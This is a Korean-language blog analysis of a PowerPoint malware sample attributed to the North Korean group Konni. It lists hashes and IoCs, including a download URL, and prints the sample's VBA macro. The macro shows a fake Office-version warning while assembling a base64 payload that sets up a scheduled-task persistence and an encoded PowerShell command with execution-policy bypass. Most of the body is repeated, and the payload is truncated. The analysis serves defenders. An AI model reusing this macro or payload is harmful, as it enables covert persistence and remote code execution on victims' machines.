북한 해킹 단체 Konni(코니)에서 만든 파워포인트 악성코드(2023.5.24)
Contents
오늘은 북한 해킹 단체 Konni(코니)에서 만든 파워포인트 악성코드에 대해 알아보겠습니다. 먼저 파워포인트는 마이크로소프트가 개발하고 파는 프레젠테이션 소프트웨어이며 ppt 가 곧 프레젠테이션을 의미합니다.
2017년 Cisco Talos 연구원이 처음 발견했으며, 2014년부터 탐지되지 않은 채 고도의 타깃 공격으로 하는 북한의 해킹 단체 Thallium, APT37과 관련된 해킹 단체이며 Kimsuky(김수키)일 가능성도 있는 단체입니다.
먼저 해당 악성코드 해쉬값은 다음과 같습니다.
파일명:b97e12807dcde2a8fd53d7f8e74336442d0cf8dbed19c0a44fcef359160bdd77.pptx
사이즈:12.3 KB
CRC32:6c7c0960
MD5:3a3ce0a1794b548682167da692052dc2
SHA-1:9f94236a481b957890cc7f7a85dc90533ba8d70b
SHA-256:b97e12807dcde2a8fd53d7f8e74336442d0cf8dbed19c0a44fcef359160bdd77
또 다른 이름은 다음과 같습니다.
b97e12807dcde2a8fd53d7f8e74336442d0cf8dbed19c0a44fcef359160bdd77
b97e12807dcde2a8fd53d7f8e74336442d0cf8dbed19c0a44fcef359160bdd77.pptx
061e17f3b2fd4a4dce1bf4f8a31198273f1abc47c32456d06fd5997ea4363578.pptx
그리고 해당 PPTX 파일을 실행하면 악성코드가 완성이 안 되었는지 에러가 나오는 것을 확인할 수가 있고 여기서 vbaProject.bin을 보면 다음과 같은 VBA 코드들이 있는 것을 확인할 수가 있습니다.
그러면 다음과 같은 코드들이 있는 것을 확인할 수가 있습니다.
Dim sTitle As String sMessage = "Sorry, PowerPoint can't read because office version is low. Please update to read." sTitle = "Microsoft PowerPoint" MsgBox sMessage, vbExclamation, sTitle sBytes = "U2V0IHNoPS(B)DcmVhdGVPYmplY3(Q)oIldTY3JpcHQuU2hlbGwiKQ0KY2w9ICJjbWQ gL2Mgc2NodGFza3MgL2NyZWF0ZSAvc2MgbWlud" sBytes = sBytes & "XRlIC9tbyA1IC90biAiIk9mZmljZSBVcGRhdGV(2)Mi4yIiIgL3RyICI iICIgJiBXU2NyaXB0LlNjcmlwdEZ1bGxOYW1lICYgIiIiIC" sBytes = sBytes & "9mIg0Kc2guUnVuIGNsLCAwDQpzaC5SdW4gInBPd0V(y)c0hlTGwgLWVw IGJ5cGFzcyAtZW5jb2RlZENvbW1hbmQgIiJKQUIxQUhJQWJ" sBytes = sBytes & "BQTlBQ2NBYUFCMEFIUUFjQUE2QUM4QUx3Qm5BR2NBTVF (B)MUFEa0FNd0F1QUdNQU1RQXVBR0lBYVFCNkFDOEFaQUJ1QUM0QWNBQm9B" sBytes = sBytes & "SEFBUHdCdUFHRUFiUUJsQUQwQUp3QXJBRnNBVXdCNU FITUF(k)QUJsQUcwQUxnQkZBRzRBZGdCcEFISUFid0J1QUcwQVpRQnVBSFFBW" sBytes = sBytes & "FFBNkFEb0FUUUJoQUdNQWFBQnBBRzRBWlFCT0FHRUFi …
2017년 Cisco Talos 연구원이 처음 발견했으며, 2014년부터 탐지되지 않은 채 고도의 타깃 공격으로 하는 북한의 해킹 단체 Thallium, APT37과 관련된 해킹 단체이며 Kimsuky(김수키)일 가능성도 있는 단체입니다.
먼저 해당 악성코드 해쉬값은 다음과 같습니다.
파일명:b97e12807dcde2a8fd53d7f8e74336442d0cf8dbed19c0a44fcef359160bdd77.pptx
사이즈:12.3 KB
CRC32:6c7c0960
MD5:3a3ce0a1794b548682167da692052dc2
SHA-1:9f94236a481b957890cc7f7a85dc90533ba8d70b
SHA-256:b97e12807dcde2a8fd53d7f8e74336442d0cf8dbed19c0a44fcef359160bdd77
또 다른 이름은 다음과 같습니다.
b97e12807dcde2a8fd53d7f8e74336442d0cf8dbed19c0a44fcef359160bdd77
b97e12807dcde2a8fd53d7f8e74336442d0cf8dbed19c0a44fcef359160bdd77.pptx
061e17f3b2fd4a4dce1bf4f8a31198273f1abc47c32456d06fd5997ea4363578.pptx
그리고 해당 PPTX 파일을 실행하면 악성코드가 완성이 안 되었는지 에러가 나오는 것을 확인할 수가 있고 여기서 vbaProject.bin을 보면 다음과 같은 VBA 코드들이 있는 것을 확인할 수가 있습니다.
그러면 다음과 같은 코드들이 있는 것을 확인할 수가 있습니다.
Dim sTitle As String sMessage = "Sorry, PowerPoint can't read because office version is low. Please update to read." sTitle = "Microsoft PowerPoint" MsgBox sMessage, vbExclamation, sTitle sBytes = "U2V0IHNoPS(B)DcmVhdGVPYmplY3(Q)oIldTY3JpcHQuU2hlbGwiKQ0KY2w9ICJjbWQ gL2Mgc2NodGFza3MgL2NyZWF0ZSAvc2MgbWlud" sBytes = sBytes & "XRlIC9tbyA1IC90biAiIk9mZmljZSBVcGRhdGV(2)Mi4yIiIgL3RyICI iICIgJiBXU2NyaXB0LlNjcmlwdEZ1bGxOYW1lICYgIiIiIC" sBytes = sBytes & "9mIg0Kc2guUnVuIGNsLCAwDQpzaC5SdW4gInBPd0V(y)c0hlTGwgLWVw IGJ5cGFzcyAtZW5jb2RlZENvbW1hbmQgIiJKQUIxQUhJQWJ" sBytes = sBytes & "BQTlBQ2NBYUFCMEFIUUFjQUE2QUM4QUx3Qm5BR2NBTVF (B)MUFEa0FNd0F1QUdNQU1RQXVBR0lBYVFCNkFDOEFaQUJ1QUM0QWNBQm9B" sBytes = sBytes & "SEFBUHdCdUFHRUFiUUJsQUQwQUp3QXJBRnNBVXdCNU FITUF(k)QUJsQUcwQUxnQkZBRzRBZGdCcEFISUFid0J1QUcwQVpRQnVBSFFBW" sBytes = sBytes & "FFBNkFEb0FUUUJoQUdNQWFBQnBBRzRBWlFCT0FHRUFi …
IoC
061e17f3b2fd4a4dce1bf4f8a31198273f1abc47c32456d06fd5997ea4363578
3a3ce0a1794b548682167da692052dc2
9f94236a481b957890cc7f7a85dc90533ba8d70b
b97e12807dcde2a8fd53d7f8e74336442d0cf8dbed19c0a44fcef359160bdd77
http://gg1593.c1.biz/dn.php
3a3ce0a1794b548682167da692052dc2
9f94236a481b957890cc7f7a85dc90533ba8d70b
b97e12807dcde2a8fd53d7f8e74336442d0cf8dbed19c0a44fcef359160bdd77
http://gg1593.c1.biz/dn.php